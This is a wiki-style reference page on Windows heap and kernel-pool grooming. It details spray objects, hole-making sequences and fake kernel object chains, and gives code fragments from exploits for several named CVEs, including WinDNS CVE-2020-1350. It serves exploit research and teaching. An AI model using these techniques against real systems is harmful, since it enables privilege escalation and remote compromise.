Heap Grooming
Last updated: 2026-04-11
Related: Pool Internals, Heap Internals, Use After Free, Cve 2021 31969, Cve 2024 30085, Cve 2021 31956, Wnf Internals, Cve 2020 1350
Tags: user-mode, kernel-mode, pool
Summary
Heap grooming (also called heap feng shui) is the art of manipulating heap layout to deterministically place objects adjacent to each other. It is a prerequisite for reliable exploitation of nearly any heap memory corruption bug: without grooming, which object sits next to the corrupted one is left to chance, and the exploit is unreliable. This page documents grooming strategies for both the kernel pool and the user-mode heap.
Core Principle
Goal: when a vulnerable allocation occurs, ensure:
[ATTACKER OBJECT][VULNERABLE OBJECT][ATTACKER OBJECT]
or
[VULNERABLE OBJECT][ATTACKER OBJECT] ← overflow from left
So that: overflowing/corrupting vulnerable object hits controlled data.
Heap allocators are deterministic given the same sequence of alloc/free operations. Grooming exploits this determinism.
LFH Grooming (Modern — Both Kernel and User-Mode Segment Heap)
LFH is activated per-bucket after ≥18 allocations of that size. Within an LFH subsegment, all blocks are the same size and packed contiguously.
LFH Grooming Procedure
Phase 1: Activate LFH for target bucket
→ allocate ≥18 objects of target size
Phase 2: Fill the subsegment (spray)
→ allocate N more objects (fill current subsegment, force new subsegment creation)
→ N ≈ subsegment_size / block_size (typically 128-256 objects)
Phase 3: Create holes
→ free every-other object (or specific pattern)
→ creates alternating free/busy pattern: [F][B][F][B][F][B]...
Phase 4: Trigger vulnerable allocation
→ vulnerable object allocated into a free slot: [F][VULN][F][B][F]...
Phase 5: Fill holes with attacker objects
→ allocate same-size attacker objects to fill remaining free slots
→ layout: [ATK][VULN][ATK][B][ATK]...
Phase 6: Trigger overflow/corruption
→ VULN overflows/underflows → hits ATK data
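The six phases can be sketched as a toy fixed-size-slot allocator in plain C. This is purely a model (names like toy_alloc and groom are invented here; a real LFH subsegment is driven by a bitmap and, on modern builds, randomizes slot choice):

```c
#include <assert.h>

/* Toy LFH subsegment: SLOTS equal-size blocks packed contiguously.
 * 0 = free, 'A' = attacker spray object, 'V' = vulnerable object. */
#define SLOTS 16
static char subseg[SLOTS];

/* Model allocator: hand out the lowest free slot. */
static int toy_alloc(char tag) {
    for (int i = 0; i < SLOTS; i++)
        if (subseg[i] == 0) { subseg[i] = tag; return i; }
    return -1; /* subsegment full */
}

static void toy_free(int i) { subseg[i] = 0; }

/* Phases 2-6 in miniature; returns the victim's slot index. */
static int groom(void) {
    for (int i = 0; i < SLOTS; i++) toy_alloc('A');  /* phase 2: spray  */
    for (int i = 0; i < SLOTS; i += 2) toy_free(i);  /* phase 3: holes  */
    int victim = toy_alloc('V');                     /* phase 4: victim */
    while (toy_alloc('A') != -1) { }                 /* phase 5: refill */
    return victim;             /* phase 6: overflow now hits 'A' data  */
}
```

In this model the victim lands in the first hole with attacker objects on both sides of the freed pattern; on a real subsegment the slot index varies, which is exactly why phase 5 refills every remaining hole.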
Size Bucket Matching
LFH bucket for size s (NT Heap):
- 1–1024 bytes: 8-byte granularity → bucket = ceil(s/8)
- 1025–4096 bytes: 16-byte granularity
- Larger sizes: progressively coarser granularity
For Segment Heap: similar bucketing, exact sizes differ.
Critical: vulnerable object and attacker object must be in the SAME LFH bucket. If they differ by even 1 byte and land in different buckets → layout not guaranteed.
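The matching rule can be expressed as a tiny helper. Thresholds here follow the simplified scheme stated above and will not match every heap flavor or Windows build; it only illustrates why a one-byte size difference can cross a bucket boundary:

```c
#include <assert.h>
#include <stddef.h>

/* Bucket index under the simplified scheme above: 8-byte steps up to
 * 1024 bytes, 16-byte steps up to 4096. Real thresholds vary by heap
 * flavor and build; this only models the matching rule. */
static unsigned lfh_bucket(size_t s) {
    if (s <= 1024) return (unsigned)((s + 7) / 8);
    if (s <= 4096) return 128 + (unsigned)((s - 1024 + 15) / 16);
    return 0; /* outside the modeled range */
}
```

Under this model a 0x28-byte request and a 0x29-byte request land in different buckets, while anything from 0x21 to 0x28 shares one bucket.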
VS (Variable Size) Segment Grooming
For allocations not in LFH (large or infrequent allocations):
Phase 1: Defragment
→ allocate many large objects to fill existing free chunks
→ creates a "clean slate" at end of segment
Phase 2: Spray
→ allocate N controlled objects of exact size
→ they land contiguously at end of current segment
Phase 3: Create gap
→ free one controlled object in the middle of the spray
→ creates a hole of exact right size
Phase 4: Trigger vulnerable alloc
→ vulnerable object should land in the hole
Phase 5: Verify (debug only)
→ read back attacker objects to confirm layout
Kernel Pool Grooming
NonPaged Pool Grooming (Pre-20H1)
Best grooming objects from user mode:
- Named pipe write buffers (NonPaged Pool): WriteFile to a blocking named pipe; size = allocation size - 8 (header)
- NtSetValueKey (registry): write a registry value → kernel allocates a Paged Pool buffer of controlled size
- PIPE_ATTRIBUTE: extremely flexible; Paged Pool, variable size, header-free body
- Event objects (NtCreateEvent): NonPaged Pool, fixed small size (~0x40)
Kernel Pool Grooming Procedure (Legacy)
1. Exhaust current free list for target size
→ allocate many spray objects to fill free list
2. Allocate vulnerable object
→ lands at end of fresh pool page
3. Allocate attacker object immediately after
→ layout: [VULN_OBJ][ATTACKER_OBJ]
4. Trigger overflow in VULN_OBJ
→ corrupt ATTACKER_OBJ header/body
Segment Heap Kernel Grooming (Post-20H1)
Must use LFH exploitation strategy (see above). Key difference:
- No chunk headers between LFH blocks → overflow hits object data directly
- Subsegment bitmap controls allocation → can be manipulated for double-alloc primitive
Pool type matters: grooming objects must live in the same pool (NonPaged vs Paged) as the vulnerable object. Named pipe write buffers go to NonPaged Pool, PIPE_ATTRIBUTE buffers to Paged Pool, and event objects to NonPaged Pool.
WNF_STATE_DATA + KeyedEvent Spray (Paged Pool — CVE-2024-26170 Pattern)
Used in the CimFS CVE-2024-26170 exploit to groom paged pool around an OOB-read victim allocation.
Objects
| Object | Size | Pool | How to allocate |
|---|---|---|---|
| _WNF_STATE_DATA | 0x880 bytes | Paged Pool | NtCreateWnfStateName() + NtUpdateWnfStateData() with 0x880-byte payload |
| KeyedEvent | 0x680 bytes | Paged Pool | NtCreateKeyedEvent() |
Strategy
Phase 1 — Fill pool pages with WNF spray:
Allocate N × _WNF_STATE_DATA (0x880) objects
Goal: force two specific objects onto the SAME page (contiguous)
Phase 2 — Create holes for victim:
Free 1/4 of the WNF objects
This creates evenly-spaced free blocks on the page
Phase 3 — Trigger victim allocation:
The target allocation (from driver IOCTL processing) falls into a hole
Now: [WNF spray][victim][WNF spray] on same page
Phase 4 — OOB read reaches spray:
Unvalidated offset calculation reaches adjacent WNF_STATE_DATA
Reads fake PFILE_OBJECT from WNF payload
Payload Structure in WNF Data
The 0x880-byte WNF payload contains a complete fake object chain:
[0x00] Fake FILE_OBJECT
FileObject->DeviceObject → ptr to fake DEVICE_OBJECT
[0x??] Fake DEVICE_OBJECT
DeviceObject->DriverObject → ptr to fake DRIVER_OBJECT
[0x??] Fake DRIVER_OBJECT
DriverObject->MajorFunction[3] → gadget_address
When the OOB read dereferences this, IoGetRelatedDeviceObject() + IofCallDriver() invoke the gadget.
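The pointer wiring can be sanity-checked entirely in user mode with stand-in structures. Field layout and the intra-payload offsets (0x100, 0x200) are arbitrary choices for this sketch, not the real kernel structure offsets:

```c
#include <assert.h>
#include <string.h>

/* Stand-ins for the three kernel structures; only the fields on the
 * dispatch path are modeled. */
typedef struct FakeDriver { void *MajorFunction[28]; } FakeDriver;
typedef struct FakeDevice { FakeDriver *DriverObject; } FakeDevice;
typedef struct FakeFile   { FakeDevice *DeviceObject; } FakeFile;

#define GADGET ((void *)0x4141414141414141ULL)

/* Lay the chain out in one flat 0x880-byte buffer, as the WNF payload
 * would, then follow the same dereference path the kernel takes. */
static void *walk_chain(void) {
    static unsigned char payload[0x880];
    memset(payload, 0, sizeof payload);

    FakeFile   *file = (FakeFile *)(payload + 0x000);
    FakeDevice *dev  = (FakeDevice *)(payload + 0x100);
    FakeDriver *drv  = (FakeDriver *)(payload + 0x200);

    file->DeviceObject    = dev;
    dev->DriverObject     = drv;
    drv->MajorFunction[3] = GADGET;

    /* Effectively IoGetRelatedDeviceObject() + IofCallDriver(): */
    return file->DeviceObject->DriverObject->MajorFunction[3];
}
```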
Why WNF_STATE_DATA Works
- Large enough (0x880) to hold the full fake object chain within one allocation
- Allocated in paged pool — matches the victim driver’s allocation pool
- NtUpdateWnfStateData allows arbitrary payload content
- Can spray hundreds of these cheaply
KeyedEvent Role
KeyedEvent objects (0x680) fill the remaining slots between WNF objects to:
- Prevent fragmentation from other background allocations
- Stabilize the page layout by saturating remaining free space
- Ensure the victim falls in the precise WNF-adjacent hole
See Cve 2024 26170 for the complete exploit using this pattern.
ALPC Handle Table Spray (Paged Pool 0x1000 — CVE-2024-30085 Pattern)
Used to place a 0x1000-byte paged pool object adjacent to a pool overflow victim, then leak its kernel pointer.
Object: _ALPC_HANDLE_TABLE
struct _ALPC_HANDLE_TABLE {
struct _ALPC_HANDLE_ENTRY* Handles; //0x0 ← kernel pointer we want to leak
struct _EX_PUSH_LOCK Lock; //0x8
ULONGLONG TotalHandles; //0x10
ULONG Flags; //0x18
};
- Initial size: 0x80 bytes
- Each NtAlpcCreateResourceReserve call adds a _KALPC_RESERVE entry
- When the table is full, it is reallocated at doubled size: 0x80 → 0x100 → 0x200 → 0x400 → 0x800 → 0x1000
- At 0x1000, the table lands in the VS segment (paged pool), matching the overflow victim size
Growing to 0x1000
// Create ALPC server port
NtAlpcCreatePort(&hPort, &portObjAttr, &portAttr);
// Fill handle table from 0x80 to 0x1000 via repeated reserve allocation
for (int j = 0; j < 127; j++)
NtAlpcCreateResourceReserve(hPort, 0, 0x28, &hResource);
// 127 entries fills 0x80→0x1000 through doublings
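As a quick check of the growth arithmetic, the table reaches 0x1000 bytes after five doublings of the initial 0x80-byte allocation:

```c
#include <assert.h>

/* Count how many capacity doublings take the handle table from its
 * initial allocation size to the target size. */
static int doublings_to(unsigned start, unsigned target) {
    int n = 0;
    while (start < target) { start *= 2; n++; }
    return n;
}
```

Five doublings (0x80 → 0x100 → 0x200 → 0x400 → 0x800 → 0x1000) put the table in the 0x1000 size class.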
Spray 0x800 ALPC ports to fill 0x1000 holes
#define NUM_ALPC 0x800
HANDLE ports[NUM_ALPC];
CreateALPCPorts(ports, NUM_ALPC);
AllocateALPCReserveHandles(ports, NUM_ALPC, reservesCount - 1);
Leak via Corrupted WNF
After an overflow corrupts _WNF_STATE_DATA.DataSize by 8 bytes (0xff0 → 0xff8), the WNF reads 8 bytes past its data boundary into the adjacent ALPC handle table:
// The leaked value at WNFOutput[0xff0] is Handles pointer from _ALPC_HANDLE_TABLE
ALPC_leak = *((unsigned long long*)(WNFOutput + 0xff0));
// Walk: KALPC_RESERVE → ALPC_PORT → EPROCESS+0x18 → Token+0x4b8
See Cve 2024 30085 for complete flow.
WNF 0xC0 Paged Pool Spray (CVE-2021-31956 Pattern)
First published use of WNF structures as paged pool grooming objects (Alex Plaskett, NCC Group, 2021). The key insight: WNF allocations go to paged pool and are precisely size-controlled from user-mode — making them ideal for placing adjacent to paged-pool overflow victims.
Objects and Sizes
_WNF_NAME_INSTANCE:
Size = 0xA8 bytes (fixed struct) + 0x10 pool header → chunk 0xB8 → rounds to 0xC0 LFH bucket
_WNF_STATE_DATA (variable body):
ExAllocatePoolWithQuotaTag(PagedPool, dataLen + 0x10, 'WNF ')
To land in 0xC0 bucket: dataLen = 0xA0 → chunk = 0xA0 + 0x10 (WNF header) + 0x10 (pool hdr) = 0xC0
Overflow victim (NtFE — NTFS EA):
NtQueryEaFile(..., Length = firstEaBlockSize)
→ allocates output buffer = firstEaBlockSize bytes
For 0xC0 bucket: Length = 0xB0 → 0xB0 + 0x10 pool header = 0xC0
All three objects — _WNF_STATE_DATA, _WNF_NAME_INSTANCE, and the NTFS EA output buffer — share the same 0xC0 LFH bucket in paged pool.
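The size arithmetic for the three co-tenants can be verified mechanically, assuming the 0x10 pool header, 0x10 WNF header, and 0x10 chunk granularity given above (helper names are invented here):

```c
#include <assert.h>

/* Round a raw size up to the assumed 0x10 chunk granularity. */
static unsigned chunk(unsigned bytes) { return (bytes + 0xF) & ~0xFu; }

/* _WNF_STATE_DATA: body + 0x10 WNF header + 0x10 pool header */
static unsigned wnf_state_data_chunk(unsigned dataLen) {
    return chunk(dataLen + 0x10 + 0x10);
}

/* _WNF_NAME_INSTANCE: 0xA8 struct + 0x10 pool header, rounded up */
static unsigned wnf_name_instance_chunk(void) {
    return chunk(0xA8 + 0x10);
}

/* NTFS EA output buffer: Length + 0x10 pool header */
static unsigned ntfs_ea_chunk(unsigned length) {
    return chunk(length + 0x10);
}
```

All three come out to 0xC0 for the parameters in the text (dataLen = 0xA0, Length = 0xB0).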
Allocation API
// Allocate _WNF_NAME_INSTANCE + _WNF_STATE_DATA (dataLen bytes body):
NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine,
FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, dataLen, 0, 0, 0, 0);
// → ExAllocatePoolWithQuotaTag(PagedPool, dataLen + 0x10, 'WNF ')
Strategy
Phase 1 — Spray 0xC0 paged pool with WNF objects:
Allocate N × WNF state names with dataLen=0xA0 (→ WNF_STATE_DATA 0xC0)
AND N × WNF_NAME_INSTANCE (each 0xC0)
Goal: fill the 0xC0 LFH subsegment
Phase 2 — Create holes:
Free every-other WNF state name → alternating free/busy pattern
Phase 3 — Trigger victim allocation:
NtQueryEaFile(Length = 0xB0) → NtFE victim allocated into a hole
Layout: [WNF][NtFE victim][WNF]..
Phase 4 — Trigger overflow:
NtQueryEaFile EA2 causes integer underflow → controlled memmove past victim
Overflow of 0x10 bytes past victim end hits adjacent WNF object:
If WNF_STATE_DATA: corrupts Header+AllocatedSize+DataSize+ChangeStamp at +0x0/+0x4/+0x8/+0xC
If WNF_NAME_INSTANCE: corrupts Header+RunRef at +0x0/+0x8
Phase 5 — Detect corrupted WNF_STATE_DATA:
NtQueryWnfStateData all state names; find one with unexpectedly large DataSize
→ identified corrupted WNF_STATE_DATA → OOB read/write relative to that object
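Phase 5's detection pass, modeled over a plain array instead of real NtQueryWnfStateData calls (find_corrupted is a hypothetical name):

```c
#include <assert.h>
#include <stddef.h>

/* Scan reported sizes for one that exceeds what was written; returns
 * the index of the corrupted object, or -1 if none stands out. */
static int find_corrupted(const unsigned *dataSizes, size_t n,
                          unsigned expected) {
    for (size_t i = 0; i < n; i++)
        if (dataSizes[i] > expected) return (int)i;
    return -1;
}
```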
Why WNF_STATE_DATA Corruption is Exploitable
Setting DataSize larger than the real allocation enables:
- OOB read: NtQueryWnfStateData copies DataSize bytes from the WNF payload → reads past the end of the allocation into adjacent paged pool objects
- OOB write: NtUpdateWnfStateData copies user data into the WNF payload up to DataSize bytes → writes into adjacent objects
From there, pivot to _WNF_NAME_INSTANCE corruption (overwrite StateData pointer → controlled AAR/AAW) or read CreatorProcess (+0x98) for an EPROCESS leak without any separate KASLR bypass.
See Wnf Internals for complete WNF structure reference and Cve 2021 31956 for full exploit chain.
Cross-Subsegment LFH → VS Overflow (CVE-2021-31969 Pattern)
Used when the overflow victim is a tiny LFH object (e.g., 0x20 bytes) but the target for corruption must be a VS-subsegment object (e.g., WNF at 0x1000 bytes). Standard LFH grooming cannot bridge the gap — this technique exhausts both LFH and VS allocator state to force them adjacent.
The Challenge
The HsRp allocation in CVE-2021-31969 is 0x20 bytes → LFH bucket. Under LFH, the victim chunk can only be adjacent to other 0x20-byte objects. WNF_STATE_DATA is 0x1000 bytes → VS segment. They cannot be adjacent under normal conditions.
Key Insight
LFH buckets (fixed-size, managed by LFH frontend) and VS subsegments (variable-size, managed by VS frontend) can be physically contiguous in pool memory when both the LFH backend and VS backend allocate new segments simultaneously.
Procedure
Step 1 — Exhaust all existing 0x20 LFH buckets:
Spray _TERMINATION_PORT objects (NtRegisterThreadTerminatePort)
→ forces LFH backend to allocate a fresh 0x20 LFH segment
→ new LFH segment appears at current pool high water mark
Step 2 — Exhaust all existing VS subsegments:
Spray _WNF_STATE_DATA (DataSize=0xff0 → 0x1000 alloc) + _TOKEN objects
→ forces VS allocator to create a new VS subsegment
→ new VS subsegment appears adjacent to (or near) the new LFH segment
Step 3 — Overflow past the LFH segment:
Trigger overflow of up to ~4 pages of DWORD(0x1000) values
If fewer than 4 LFH pages exist between victim and VS subsegment:
overflow crosses the LFH boundary into the VS subsegment
Step 4 — WNF gets overwritten:
DWORD(0x1000) values overwrite WNF_STATE_DATA.AllocatedSize = 0x1000
WNF_STATE_DATA.DataSize = 0x1000
→ page-sized OOB read/write via NtQueryWnfStateData/NtUpdateWnfStateData
Spray Object: _TERMINATION_PORT (0x20 LFH filler)
struct _TERMINATION_PORT {
struct _TERMINATION_PORT* Next; //0x0
VOID* Port; //0x8
};
// Allocated via NtRegisterThreadTerminatePort(alpcPortHandle)
// Freed when thread terminates — use a worker thread with synchronized exit
Reliability
This technique requires luck with layout — pool spray must exhaust both allocators simultaneously. Run sufficient spray volume (thousands of objects) to maximize the probability that new LFH and VS segments land adjacent. Expect <100% reliability; tune based on crash vs. success ratio.
See Cve 2021 31969 for full implementation.
Cross-Cache / Cross-Pool Grooming
When vulnerable object and attacker object must be in different pools/caches, grooming becomes harder:
- Must cause pools to grow into the same page (uncommon but possible with careful timing)
- Alternative: find an object in the same pool as vulnerable object that you can control
Measuring Grooming Success
Debug Approach
- Enable heap metadata tracing (ETW heap events)
- Allocate spray objects → record their addresses
- Trigger target allocation → check address
- Calculate relative distance from nearest spray object
Production Approach (Reliability Engineering)
- Run exploit 100+ times in controlled environment
- Measure % of runs where grooming succeeded
- Tune phase 2 (spray count) and phase 3 (hole creation pattern) until >90% reliable
Grooming Anti-Patterns
| Mistake | Effect |
|---|---|
| Wrong LFH bucket | Objects in different subsegments → layout non-deterministic |
| Too few spray objects | Holes in other pages get filled first |
| Not activating LFH first | VS segment used → non-contiguous layout |
| Pool type mismatch | Attacker objects in Paged Pool, vulnerable in NonPaged → never adjacent |
| Not draining lookaside first | Lookaside list returns stale chunks before reaching target region |
_WNF_NAME_INSTANCE Pre-Spray (Preventing LFH Pollution)
When spraying _WNF_STATE_DATA objects to fill a VS subsegment, each WNF allocation also creates a companion _WNF_NAME_INSTANCE object (size ~0xD0) as a side effect. Without mitigation, these 0xD0 allocations cause the LFH frontend to create an additional 0xD0 LFH segment, which may fall between the intended LFH and VS subsegments and disrupt the cross-subsegment layout.
Solution: Pre-spray 0xD0 pool holes before the main spray:
for (UINT i = 0; i < 0x4000; i++)
AllocateWnfObject(0xD0, &gStateName[i]);
for (UINT i = 0; i < 0x4000; i++)
NtDeleteWnfStateName(&gStateName[i]);
// Now _WNF_NAME_INSTANCE objects land in pre-existing holes,
// not in new LFH segments that would disrupt layout
Used in CVE-2022-22715 (Windows Dirty Pipe). Cross-reference: Wnf Internals.
VS Pool RBTree Repair (Post-OOB-Write Cleanup)
When a massive OOB write (e.g., CVE-2022-22715’s 0xFFFE-byte write) corrupts the VS subsegment’s Red-Black Tree metadata alongside object content, the Segment Heap allocator will BSOD on the next allocation or free because it dereferences the corrupted tree node pointers.
Each VS subsegment RBTree node layout:
+0x00 Left child pointer
+0x08 Right child pointer
+0x10 Parent pointer
Fix procedure (requires arbitrary R/W already established via PreviousMode flip):
1. Compute the VS pool manager address from known globals + pool chunk address:
   // CVE-2022-22715 formula:
   UINT64 pHpMgr = (globalHeap ^ pPoolChunkAddr ^ pPoolChunkValue ^ 0xA2E64EADA2E64EAD) - 0x100 + 0x290;
2. Walk the RBTree from the root (pHpMgr → left child), traversing toward the corrupted chunk's address:
   // Navigate: if target < current → go left; if target > current → go right
   // When found: overwrite node with a fake node (zero children, relink parent)
   WriteKernel(corruptNode + 0x00, 0);          // null left child
   WriteKernel(corruptNode + 0x08, 0);          // null right child
   WriteKernel(corruptNode + 0x10, parentPtr);  // maintain parent link
3. Traverse from both the left and right subtrees of the root to catch all paths to the corrupt node
Cost: Any VS chunks parented under the deleted node become unreachable (memory leak), but the system no longer crashes. Acceptable trade-off for a stable exploit.
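The walk-and-unlink can be prototyped in user mode with a toy tree that mirrors the three-pointer node layout; direct stores stand in for WriteKernel, and color/rebalancing bookkeeping is ignored:

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>

/* Toy node with the same three-pointer layout as the text:
 * +0x00 left, +0x08 right, +0x10 parent; addr is the search key. */
typedef struct Node {
    struct Node *left, *right, *parent;
    uintptr_t    addr;
} Node;

/* Walk toward the corrupt chunk's address, then detach it as in the
 * procedure above: zero both children and keep the parent's links
 * consistent. Its subtrees leak, but nothing dangles. */
static Node *repair(Node *root, uintptr_t target) {
    Node *cur = root;
    while (cur && cur->addr != target)
        cur = (target < cur->addr) ? cur->left : cur->right;
    if (!cur) return NULL;
    if (cur->parent) {                    /* stand-in for the     */
        if (cur->parent->left == cur)     /* WriteKernel() stores */
            cur->parent->left = NULL;
        else
            cur->parent->right = NULL;
    }
    cur->left = cur->right = NULL;
    return cur;
}

/* Three-node demo: corrupt node at "address" 0x1000 gets detached. */
static int repair_demo(void) {
    Node lo   = { NULL, NULL, NULL, 0x1000 };
    Node hi   = { NULL, NULL, NULL, 0x3000 };
    Node root = { &lo,  &hi,  NULL, 0x2000 };
    lo.parent = hi.parent = &root;
    Node *fixed = repair(&root, 0x1000);
    return fixed == &lo && root.left == NULL && lo.left == NULL;
}
```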
Used in CVE-2022-22715. See also Cve 2022 22715.
Application-Specific Custom Allocator Grooming (WinDNS / CVE-2020-1350 Pattern)
When a target service maintains its own memory pool (rather than using the OS allocator directly), grooming must understand that allocator’s semantics. WinDNS (dns.exe) is the canonical example.
WinDNS Custom Allocator Properties
- Buckets: 0x50, 0x68, 0x88, 0xA0 (singly linked LIFO freelists)
- Sizes > 0xA0: delegates to HeapAlloc
- Freed objects: pushed back onto the bucket freelist, never returned to the native heap
- Chunk isolation: native heap chunks (0xFF0/0xFA0 sized) contain only WinDNS bucket buffers — no mixing with other application allocations
- Chunk contiguity: spray order = allocation order within a new native chunk (LIFO within chunk)
This isolation means: if the overflow buffer is < 0xA0 bytes, the overflow walks into other WinDNS bucket buffers, never into OS heap metadata or unrelated data.
TTL as Heap Primitive
The DNS server’s record cache respects TTL values set by the responding DNS server. In CVE-2020-1350, the attacker is the responding DNS server:
| TTL value | Effect |
|---|---|
| Long TTL | Record cached indefinitely → buffer stays allocated |
| Short TTL | Record freed after ~2 minutes (next cache cleanup cycle) |
| dwTTL = 0 and dwTimeStamp = 0 in fake record | Record treated as already expired → freed on next DNS query for that name |
The zero-TTL trick enables immediate controlled free without waiting 2 minutes — critical for the later staged exploitation.
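A minimal model of the cleanup predicate implied by the table (field names follow the text; the real dns.exe expiry logic is more involved):

```c
#include <assert.h>

/* Record fields named as in the text; expiry modeled as
 * timestamp + TTL <= now. */
typedef struct {
    unsigned dwTTL;        /* lifetime in seconds */
    unsigned dwTimeStamp;  /* insertion time */
} CachedRecord;

static int is_expired(const CachedRecord *r, unsigned now) {
    return r->dwTimeStamp + r->dwTTL <= now;
}
```

With dwTTL = 0 and dwTimeStamp = 0, the record is expired from the moment it is inserted, so the next query for that name frees it immediately; a long TTL keeps the buffer allocated.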
Hole-Making Procedure (Avoid SEGFAULT)
1. Heap spray: send many subdomain queries → malicious DNS server responds with records (long TTL) → victim caches them → fills WinDNS bucket heap
2. Assign short TTL to exactly one subdomain (the "target" slot)
3. Wait ~2 minutes for WinDNS cleanup to free the target record buffer
4. Re-query the target subdomain with the malformed SIG payload
→ LIFO: new allocation lands in the exactly freed slot
→ overflow stays within the already-mapped heap segment → no SEGFAULT
Grooming to Avoid Cache Tree Corruption
The DNS record cache is a binary tree. Tree nodes are 0x88-byte objects (Bucket 3). When a new 0xFF0 native heap chunk is allocated for Bucket 3, tree nodes appear adjacent to spray buffers:
Fix:
- Pre-exhaust the Bucket 3 freelist: allocate many 0x88-byte records, then expire them. They go back onto the freelist.
- Subsequent tree node allocations consume the freelist entries → no new native heap chunks needed → tree nodes never appear adjacent to the spray region.
- Spray enough 0xA0 records to fill an entire new native chunk — the overflow target and its neighbours are then exclusively attacker-controlled 0xA0 records.
Controlling Reallocation (Fake wRecordSize)
By overwriting RR_Record.wRecordSize in a fake record, the exploit forges which bucket size is reported when the buffer is “freed” via the zero-TTL trick. The LIFO allocator then serves the next allocation of that bucket size from the controlled slot:
Fake RR_Record.wRecordSize = 0x50
→ Free fake record (zero TTL query)
→ Buffer pushed back onto 0x50 bucket freelist
→ Next 0x50 allocation (e.g., DNS_Timeout object) lands in this slot
This is the mechanism for injecting arbitrary object types into the controlled heap region.
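The forged-size free can be modeled with a toy LIFO freelist. dns_free and dns_alloc are invented names, and the slab path that backs empty freelists is omitted:

```c
#include <assert.h>
#include <stddef.h>

#define BUCKETS 4
static const unsigned bucket_sizes[BUCKETS] = { 0x50, 0x68, 0x88, 0xA0 };
static void *freelist[BUCKETS];  /* LIFO heads, one per bucket */

static int bucket_of(unsigned size) {
    for (int i = 0; i < BUCKETS; i++)
        if (size <= bucket_sizes[i]) return i;
    return -1;  /* > 0xA0 would go to the native heap instead */
}

/* Free: push onto the freelist named by the (forgeable) size field,
 * threading the next pointer through the buffer's first 8 bytes. */
static void dns_free(void *buf, unsigned wRecordSize) {
    int b = bucket_of(wRecordSize);
    if (b < 0) return;
    *(void **)buf = freelist[b];
    freelist[b] = buf;
}

/* Alloc: pop the LIFO head. */
static void *dns_alloc(unsigned size) {
    int b = bucket_of(size);
    if (b < 0) return NULL;
    void *buf = freelist[b];
    if (buf) freelist[b] = *(void **)buf;
    return buf;
}

/* Demo: a record freed with a forged wRecordSize of 0x50 is handed
 * to the next 0x50-byte allocation, whatever object type that is. */
static int confusion_demo(void) {
    static unsigned char fake_record[0xA0];  /* really 0xA0 bytes */
    dns_free(fake_record, 0x50);             /* forged size field */
    return dns_alloc(0x50) == (void *)fake_record;
}
```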
Key Contrast with Kernel Pool Grooming
| Property | Kernel Pool (Segment Heap LFH) | WinDNS Custom Allocator |
|---|---|---|
| Allocation order | LFH: pseudo-random within subsegment | LIFO: fully deterministic |
| Free behavior | Returns to LFH bitmap | Returns to bucket freelist (LIFO) |
| Bucket activation | ≥18 allocs | Always active |
| External mixing | Other kernel objects share page | Isolated — only WinDNS objects in chunk |
| Heap primitive | Race/timing sensitive | TTL (attacker-controlled DNS response) |
See Cve 2020 1350 for the complete exploit chain.
Exploit Relevance
Grooming is the difference between a crash and a working exploit. Budget significant time for grooming — it is often 50%+ of exploit-development work. Reliability below 70% in the lab means unreliable in production, due to ASLR and system-load variation.
References
- “Heap Feng Shui in JavaScript” — Alexander Sotirov (pioneered the concept)
- “Kernel Pool Exploitation” — Tarjei Mandt (Azimuth Security)
- “Pool Party” — SafeBreach Labs (2023) — novel Windows thread pool grooming
- “Exploiting Windows Kernel Pool” — Valentina Palmiotti, OffensiveCon 2021
- Corelan heap exploitation tutorials — corelan.be
